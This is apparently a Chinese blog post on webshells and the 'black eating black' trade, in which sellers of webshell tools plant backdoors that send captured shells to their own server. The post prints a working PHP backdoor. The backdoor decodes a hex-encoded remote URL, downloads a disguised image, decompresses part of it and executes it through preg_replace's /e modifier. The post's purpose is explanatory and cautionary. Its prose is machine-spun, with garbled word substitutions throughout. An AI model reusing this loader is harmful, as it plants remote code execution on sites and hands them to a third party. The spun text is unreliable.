webshell的获取一样平常要跟大马小马这些挂上一个√(就算是命令实行也须要shell)。webshell大略理解便是网站的一个管理程序,可以上传下载等等一系列操作,而大小马则是这个管理程序的代码。
关于后门
一样平常存在后门的话,所得到的shell会通过后门发送给箱子,那个箱子便是用来装shell的地方!

举个例子
<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(
sprintf('%s?%s',pack("H",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace("~(.)~ies",gzuncompress($_SESSION['api']),null);
?>
这里我们紧张看
sprintf('%s?%s',pack("H",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())
这串代码看起来可能平平无奇,但是实行过后实在是一张箱子的图片地址,这个地址我就不放出来了,有兴趣的可以自己搭建解密!
这个图片还须要调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。末了调用preg_replace的润色符e来实行恶意代码。然后,shell就被装进箱子里了。
黑吃黑是怎么形成的
实在网络安全圈子里定义一贯模糊,有人兢兢业业挖洞,做src;有人背地里干违法勾当,赚黑心钱。每天在群里秀,挖洞的一部分人就会想
同样是技能,那凭什么我的付出和收入没有他做一单高?就受不住诱惑投入黑产了。殊不知在群里秀的那群人,早已喝茶去了……极少数违法分子就以为自己挖太危险了,重新换个思路:
供应大小马之类的工具,再写上一句免责声明,加个后门,想着坐等shell进账***,出了事也不会被深究。毕竟后门代码一样平常小白还真不会去管,他们胆子大,技能差。这里奉劝萌新小白们别干事不经大脑思考,盲目炫技末了只能进去喝透心凉茶!!
!
这伙人写好了后门,猖獗推广,进账,然后被抓…
“违法犯罪得事一定不能做!
”
这便是黑吃黑家当链了,他们背后链接的家当咋们下期再说!
也希望各位网络安全爱好者,同行,且行且珍惜,莫做违法事!
制作不易点个赞再走吧!
靓仔!
#网络安全在我身边#